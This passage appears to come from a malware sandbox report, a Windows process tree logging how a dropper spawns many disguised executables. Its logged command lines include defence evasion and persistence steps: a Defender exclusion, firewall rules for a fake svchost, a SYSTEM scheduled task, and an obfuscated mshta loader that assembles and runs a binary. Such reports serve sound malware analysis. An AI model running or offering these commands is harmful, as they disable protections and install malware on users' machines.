                                                                                                                                                                        • C:\Users\Admin\Pictures\Adobe Films\GrGMu1jtRUEKfTZWJK40WE4K.exe
                                                                                                                                                                          "C:\Users\Admin\Pictures\Adobe Films\GrGMu1jtRUEKfTZWJK40WE4K.exe"
                                                                                                                                                                          3⤵
                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                          PID:2696
                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 2696 -s 204
                                                                                                                                                                            4⤵
                                                                                                                                                                            • Program crash
                                                                                                                                                                            • Checks processor information in registry
                                                                                                                                                                            • Enumerates system info in registry
                                                                                                                                                                            PID:1704
                                                                                                                                                                      • C:\Users\Admin\Pictures\Adobe Films\W4ysop1FHYRr_xdZXf7ZCJ_e.exe
                                                                                                                                                                        "C:\Users\Admin\Pictures\Adobe Films\W4ysop1FHYRr_xdZXf7ZCJ_e.exe"
                                                                                                                                                                        2⤵
                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                        • Suspicious use of SetThreadContext
                                                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                        PID:4940
                                                                                                                                                                        • C:\Users\Admin\Pictures\Adobe Films\W4ysop1FHYRr_xdZXf7ZCJ_e.exe
                                                                                                                                                                          "C:\Users\Admin\Pictures\Adobe Films\W4ysop1FHYRr_xdZXf7ZCJ_e.exe"
                                                                                                                                                                          3⤵
                                                                                                                                                                            PID:6096
                                                                                                                                                                        • C:\Users\Admin\Pictures\Adobe Films\g8fcyuzFoqvSg8OUP0tHcBoy.exe
                                                                                                                                                                          "C:\Users\Admin\Pictures\Adobe Films\g8fcyuzFoqvSg8OUP0tHcBoy.exe"
                                                                                                                                                                          2⤵
                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                          • Checks BIOS information in registry
                                                                                                                                                                          • Checks whether UAC is enabled
                                                                                                                                                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                          PID:2800
                                                                                                                                                                        • C:\Users\Admin\Pictures\Adobe Films\7qn4oO9BoLqPcXPnJsizWxHM.exe
                                                                                                                                                                          "C:\Users\Admin\Pictures\Adobe Films\7qn4oO9BoLqPcXPnJsizWxHM.exe"
                                                                                                                                                                          2⤵
                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                          PID:1416
                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 1416 -s 1584
                                                                                                                                                                            3⤵
                                                                                                                                                                            • Program crash
                                                                                                                                                                            • Checks processor information in registry
                                                                                                                                                                            • Enumerates system info in registry
                                                                                                                                                                            PID:3748
                                                                                                                                                                        • C:\Users\Admin\Pictures\Adobe Films\gG966mdTjMQCGobSA1xfEzb7.exe
                                                                                                                                                                          "C:\Users\Admin\Pictures\Adobe Films\gG966mdTjMQCGobSA1xfEzb7.exe"
                                                                                                                                                                          2⤵
                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                          PID:2112
                                                                                                                                                                        • C:\Users\Admin\Pictures\Adobe Films\71hdwuYNuZsjLfxrzhnRb4Ls.exe
                                                                                                                                                                          "C:\Users\Admin\Pictures\Adobe Films\71hdwuYNuZsjLfxrzhnRb4Ls.exe"
                                                                                                                                                                          2⤵
                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                          • Drops file in Program Files directory
                                                                                                                                                                          PID:1668
                                                                                                                                                                          • C:\Program Files (x86)\Company\NewProduct\cutm3.exe
                                                                                                                                                                            "C:\Program Files (x86)\Company\NewProduct\cutm3.exe"
                                                                                                                                                                            3⤵
                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                            PID:5236
                                                                                                                                                                          • C:\Program Files (x86)\Company\NewProduct\DownFlSetup999.exe
                                                                                                                                                                            "C:\Program Files (x86)\Company\NewProduct\DownFlSetup999.exe"
                                                                                                                                                                            3⤵
                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                            PID:5272
                                                                                                                                                                          • C:\Program Files (x86)\Company\NewProduct\inst3.exe
                                                                                                                                                                            "C:\Program Files (x86)\Company\NewProduct\inst3.exe"
                                                                                                                                                                            3⤵
                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                            PID:5372
                                                                                                                                                                        • C:\Users\Admin\Pictures\Adobe Films\N0NCDPohiNjHdlr2B2UqrBcW.exe
                                                                                                                                                                          "C:\Users\Admin\Pictures\Adobe Films\N0NCDPohiNjHdlr2B2UqrBcW.exe"
                                                                                                                                                                          2⤵
                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                          • Checks whether UAC is enabled
                                                                                                                                                                          PID:5040
                                                                                                                                                                        • C:\Users\Admin\Pictures\Adobe Films\27nNpMIlNTg7B__qK3RO47JE.exe
                                                                                                                                                                          "C:\Users\Admin\Pictures\Adobe Films\27nNpMIlNTg7B__qK3RO47JE.exe"
                                                                                                                                                                          2⤵
                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                          • Checks BIOS information in registry
                                                                                                                                                                          • Checks whether UAC is enabled
                                                                                                                                                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                          PID:4384
                                                                                                                                                                        • C:\Users\Admin\Pictures\Adobe Films\DKAkDeyF1LExOxO6TrKZ5_B7.exe
                                                                                                                                                                          "C:\Users\Admin\Pictures\Adobe Films\DKAkDeyF1LExOxO6TrKZ5_B7.exe"
                                                                                                                                                                          2⤵
                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                          • Checks BIOS information in registry
                                                                                                                                                                          • Checks whether UAC is enabled
                                                                                                                                                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                          PID:5100
                                                                                                                                                                        • C:\Users\Admin\Pictures\Adobe Films\E8b5UKJ6STYQ0e00s7p6lTHo.exe
                                                                                                                                                                          "C:\Users\Admin\Pictures\Adobe Films\E8b5UKJ6STYQ0e00s7p6lTHo.exe"
                                                                                                                                                                          2⤵
                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                          • Checks BIOS information in registry
                                                                                                                                                                          • Checks whether UAC is enabled
                                                                                                                                                                          • Drops file in Windows directory
                                                                                                                                                                          PID:448
                                                                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\
                                                                                                                                                                            3⤵
                                                                                                                                                                            • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                            PID:2180
                                                                                                                                                                          • C:\Windows\System32\netsh.exe
                                                                                                                                                                            "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=in action=allow program="C:\Windows\System\svchost.exe" enable=yes
                                                                                                                                                                            3⤵
                                                                                                                                                                              PID:3216
                                                                                                                                                                            • C:\Windows\System32\netsh.exe
                                                                                                                                                                              "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=out action=allow program="C:\Windows\System\svchost.exe" enable=yes
                                                                                                                                                                              3⤵
                                                                                                                                                                                PID:5304
                                                                                                                                                                              • C:\Windows\SYSTEM32\schtasks.exe
                                                                                                                                                                                schtasks /create /sc minute /ED "11/02/2024" /mo 7 /tn "Timer" /tr c:\windows\system\svchost.exe /ru SYSTEM
                                                                                                                                                                                3⤵
                                                                                                                                                                                • Creates scheduled task(s)
                                                                                                                                                                                PID:1212
                                                                                                                                                                              • C:\Windows\System\svchost.exe
                                                                                                                                                                                "C:\Windows\System\svchost.exe" formal
                                                                                                                                                                                3⤵
                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                • Checks BIOS information in registry
                                                                                                                                                                                • Checks whether UAC is enabled
                                                                                                                                                                                • Drops file in Windows directory
                                                                                                                                                                                PID:1764
                                                                                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\
                                                                                                                                                                                  4⤵
                                                                                                                                                                                    PID:4076
                                                                                                                                                                                  • C:\Windows\System32\netsh.exe
                                                                                                                                                                                    "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=in action=allow program="C:\Windows\System\svchost.exe" enable=yes
                                                                                                                                                                                    4⤵
                                                                                                                                                                                      PID:496
                                                                                                                                                                                    • C:\Windows\System32\netsh.exe
                                                                                                                                                                                      "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=out action=allow program="C:\Windows\System\svchost.exe" enable=yes
                                                                                                                                                                                      4⤵
                                                                                                                                                                                        PID:4620
                                                                                                                                                                                  • C:\Users\Admin\Pictures\Adobe Films\ztFLqZo8tsSQFc1wqHeNc22m.exe
                                                                                                                                                                                    "C:\Users\Admin\Pictures\Adobe Films\ztFLqZo8tsSQFc1wqHeNc22m.exe"
                                                                                                                                                                                    2⤵
                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                    PID:2444
                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 2444 -s 260
                                                                                                                                                                                      3⤵
                                                                                                                                                                                      • Program crash
                                                                                                                                                                                      • Checks processor information in registry
                                                                                                                                                                                      • Enumerates system info in registry
                                                                                                                                                                                      PID:2308
                                                                                                                                                                                  • C:\Users\Admin\Pictures\Adobe Films\tGPLfmakviwwx8D8QKxJELZ_.exe
                                                                                                                                                                                    "C:\Users\Admin\Pictures\Adobe Films\tGPLfmakviwwx8D8QKxJELZ_.exe"
                                                                                                                                                                                    2⤵
                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                    • Suspicious use of SetThreadContext
                                                                                                                                                                                    PID:1548
                                                                                                                                                                                    • C:\Users\Admin\Pictures\Adobe Films\tGPLfmakviwwx8D8QKxJELZ_.exe
                                                                                                                                                                                      "C:\Users\Admin\Pictures\Adobe Films\tGPLfmakviwwx8D8QKxJELZ_.exe"
                                                                                                                                                                                      3⤵
                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                      • Checks SCSI registry key(s)
                                                                                                                                                                                      • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                      PID:3844
                                                                                                                                                                                  • C:\Users\Admin\Pictures\Adobe Films\LLM8p_bDrZ_4l1sMHXmCXrq8.exe
                                                                                                                                                                                    "C:\Users\Admin\Pictures\Adobe Films\LLM8p_bDrZ_4l1sMHXmCXrq8.exe"
                                                                                                                                                                                    2⤵
                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                    PID:4800
                                                                                                                                                                                    • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                      "C:\Windows\System32\mshta.exe" VBsCRIPt:cLose ( creAteObjecT ("WScRipT.SHElL" ). RuN ( "CMd /r CopY /y ""C:\Users\Admin\Pictures\Adobe Films\LLM8p_bDrZ_4l1sMHXmCXrq8.exe"" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP & If """"== """" for %K iN ( ""C:\Users\Admin\Pictures\Adobe Films\LLM8p_bDrZ_4l1sMHXmCXrq8.exe"" ) do taskkill -im ""%~NxK"" -F " ,0, trUE ) )
                                                                                                                                                                                      3⤵
                                                                                                                                                                                        PID:3136
                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                          "C:\Windows\System32\cmd.exe" /r CopY /y "C:\Users\Admin\Pictures\Adobe Films\LLM8p_bDrZ_4l1sMHXmCXrq8.exe" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP &If ""== "" for %K iN ( "C:\Users\Admin\Pictures\Adobe Films\LLM8p_bDrZ_4l1sMHXmCXrq8.exe" ) do taskkill -im "%~NxK" -F
                                                                                                                                                                                          4⤵
                                                                                                                                                                                            PID:5720
                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\8pWB.eXE
                                                                                                                                                                                              8pWB.eXe /pO_wtib1KE0hzl7U9_CYP
                                                                                                                                                                                              5⤵
                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                              PID:5336
                                                                                                                                                                                              • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                "C:\Windows\System32\mshta.exe" VBsCRIPt:cLose ( creAteObjecT ("WScRipT.SHElL" ). RuN ( "CMd /r CopY /y ""C:\Users\Admin\AppData\Local\Temp\8pWB.eXE"" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP & If ""/pO_wtib1KE0hzl7U9_CYP ""== """" for %K iN ( ""C:\Users\Admin\AppData\Local\Temp\8pWB.eXE"" ) do taskkill -im ""%~NxK"" -F " ,0, trUE ) )
                                                                                                                                                                                                6⤵
                                                                                                                                                                                                  PID:3728
                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                    "C:\Windows\System32\cmd.exe" /r CopY /y "C:\Users\Admin\AppData\Local\Temp\8pWB.eXE" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP &If "/pO_wtib1KE0hzl7U9_CYP "== "" for %K iN ( "C:\Users\Admin\AppData\Local\Temp\8pWB.eXE" ) do taskkill -im "%~NxK" -F
                                                                                                                                                                                                    7⤵
                                                                                                                                                                                                      PID:836
                                                                                                                                                                                                  • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                    "C:\Windows\System32\mshta.exe" VbScRIpT: close (crEaTEOBject ( "WSCRIPt.SheLl" ). rUn ( "C:\Windows\system32\cmd.exe /c EcHO | seT /p = ""MZ"" > 1AQCPNL9.1 &CoPy /b /Y 1AqCPnL9.1 + HxU0.m + HR0NM.yl + _AECH.7 + ThBtZ22Y.U +1MRAv8.M + QZ5UW.aQ+ KKAyEq.00 N3V4H8H.sXy & STARt msiexec.exe -y .\N3V4H8H.SXY " , 0 , TruE ) )
                                                                                                                                                                                                    6⤵
                                                                                                                                                                                                      PID:1408
                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                        "C:\Windows\system32\cmd.exe" /c EcHO | seT /p = "MZ" > 1AQCPNL9.1 &CoPy /b /Y 1AqCPnL9.1 + HxU0.m + HR0NM.yl + _AECH.7 + ThBtZ22Y.U +1MRAv8.M + QZ5UW.aQ+ KKAyEq.00 N3V4H8H.sXy & STARt msiexec.exe -y .\N3V4H8H.SXY
                                                                                                                                                                                                        7⤵
                                                                                                                                                                                                          PID:3656
                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                            C:\Windows\system32\cmd.exe /S /D /c" seT /p = "MZ" 1>1AQCPNL9.1"
                                                                                                                                                                                                            8⤵
                                                                                                                                                                                                              PID:2196
                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                              C:\Windows\system32\cmd.exe /S /D /c" EcHO "
                                                                                                                                                                                                              8⤵
                                                                                                                                                                                                                PID:5048
                                                                                                                                                                                                              • C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                                msiexec.exe -y .\N3V4H8H.SXY
                                                                                                                                                                                                                8⤵
                                                                                                                                                                                                                • Loads dropped DLL
                                                                                                                                                                                                                PID:5580
                                                                                                                                                                                                        • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                          taskkill -im "LLM8p_bDrZ_4l1sMHXmCXrq8.exe" -F
                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                          • Kills process with taskkill
                                                                                                                                                                                                          PID:3500
                                                                                                                                                                                                  • C:\Users\Admin\Pictures\Adobe Films\wqbiRgzzrWfkfpbw9ubodg0k.exe
                                                                                                                                                                                                    "C:\Users\Admin\Pictures\Adobe Films\wqbiRgzzrWfkfpbw9ubodg0k.exe"
                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                    • Suspicious use of SetThreadContext
                                                                                                                                                                                                    PID:2608
                                                                                                                                                                                                    • C:\Users\Admin\Pictures\Adobe Films\wqbiRgzzrWfkfpbw9ubodg0k.exe
                                                                                                                                                                                                      "C:\Users\Admin\Pictures\Adobe Films\wqbiRgzzrWfkfpbw9ubodg0k.exe"
                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                      PID:3360
                                                                                                                                                                                                  • C:\Users\Admin\Pictures\Adobe Films\gQG7ehujuMNa34AUJoZTHfYH.exe
                                                                                                                                                                                                    "C:\Users\Admin\Pictures\Adobe Films\gQG7ehujuMNa34AUJoZTHfYH.exe"
                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                    PID:3352
                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\is-3V3A5.tmp\gQG7ehujuMNa34AUJoZTHfYH.tmp
                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\is-3V3A5.tmp\gQG7ehujuMNa34AUJoZTHfYH.tmp" /SL5="$4017C,506127,422400,C:\Users\Admin\Pictures\Adobe Films\gQG7ehujuMNa34AUJoZTHfYH.exe"
                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                      • Loads dropped DLL
                                                                                                                                                                                                      PID:816
                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\is-T530Q.tmp\DYbALA.exe
                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\is-T530Q.tmp\DYbALA.exe" /S /UID=2710
                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                        • Drops file in Drivers directory
                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                        • Adds Run key to start application
                                                                                                                                                                                                        PID:4424
                                                                                                                                                                                                        • C:\Program Files\Reference Assemblies\NLVRILOBGT\foldershare.exe
                                                                                                                                                                                                          "C:\Program Files\Reference Assemblies\NLVRILOBGT\foldershare.exe" /VERYSILENT
                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                          • Suspicious behavior: GetForegroundWindowSpam
                                                                                                                                                                                                          PID:3700
                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\4f-bc8a3-34a-bc7b2-bf763876be37d\Qulaepurola.exe
                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\4f-bc8a3-34a-bc7b2-bf763876be37d\Qulaepurola.exe"
                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                            PID:4936
                                                                                                                                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e6
                                                                                                                                                                                                              6⤵
                                                                                                                                                                                                                PID:1656
                                                                                                                                                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7fffd2a546f8,0x7fffd2a54708,0x7fffd2a54718
                                                                                                                                                                                                                  7⤵
                                                                                                                                                                                                                    PID:1956
                                                                                                                                                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2008,16617225312044534049,6042884649164839992,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2144 /prefetch:3
                                                                                                                                                                                                                    7⤵
                                                                                                                                                                                                                      PID:1624
                                                                                                                                                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2008,16617225312044534049,6042884649164839992,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2020 /prefetch:2
                                                                                                                                                                                                                      7⤵
                                                                                                                                                                                                                        PID:4028
                                                                                                                                                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad
                                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                                        PID:1908
                                                                                                                                                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7fffd2a546f8,0x7fffd2a54708,0x7fffd2a54718
                                                                                                                                                                                                                          7⤵
                                                                                                                                                                                                                            PID:5192
                                                                                                                                                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=1851483
                                                                                                                                                                                                                          6⤵
                                                                                                                                                                                                                            PID:4868
                                                                                                                                                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7fffd2a546f8,0x7fffd2a54708,0x7fffd2a54718
                                                                                                                                                                                                                              7⤵
                                                                                                                                                                                                                                PID:5804
                                                                                                                                                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=1851513
                                                                                                                                                                                                                              6⤵
                                                                                                                                                                                                                                PID:4176
                                                                                                                                                                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7fffd2a546f8,0x7fffd2a54708,0x7fffd2a54718
                                                                                                                                                                                                                                  7⤵
                                                                                                                                                                                                                                    PID:5084
                                                                                                                                                                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.directdexchange.com/jump/next.php?r=2087215
                                                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                                                    PID:6432
                                                                                                                                                                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7fffd2a546f8,0x7fffd2a54708,0x7fffd2a54718
                                                                                                                                                                                                                                      7⤵
                                                                                                                                                                                                                                        PID:6676
                                                                                                                                                                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.directdexchange.com/jump/next.php?r=4263119
                                                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                                                        PID:1712
                                                                                                                                                                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7fffd2a546f8,0x7fffd2a54708,0x7fffd2a54718
                                                                                                                                                                                                                                          7⤵
                                                                                                                                                                                                                                            PID:2552
                                                                                                                                                                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?id=1294231
                                                                                                                                                                                                                                          6⤵
                                                                                                                                                                                                                                            PID:6724
                                                                                                                                                                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7fffd2a546f8,0x7fffd2a54708,0x7fffd2a54718
                                                                                                                                                                                                                                              7⤵
                                                                                                                                                                                                                                                PID:5060
                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\ab-537c1-cef-14eb9-66d5c54198dc6\Tiqygaeberi.exe
                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\ab-537c1-cef-14eb9-66d5c54198dc6\Tiqygaeberi.exe"
                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                              PID:396
                                                                                                                                                                                                                                              • C:\Windows\System32\cmd.exe
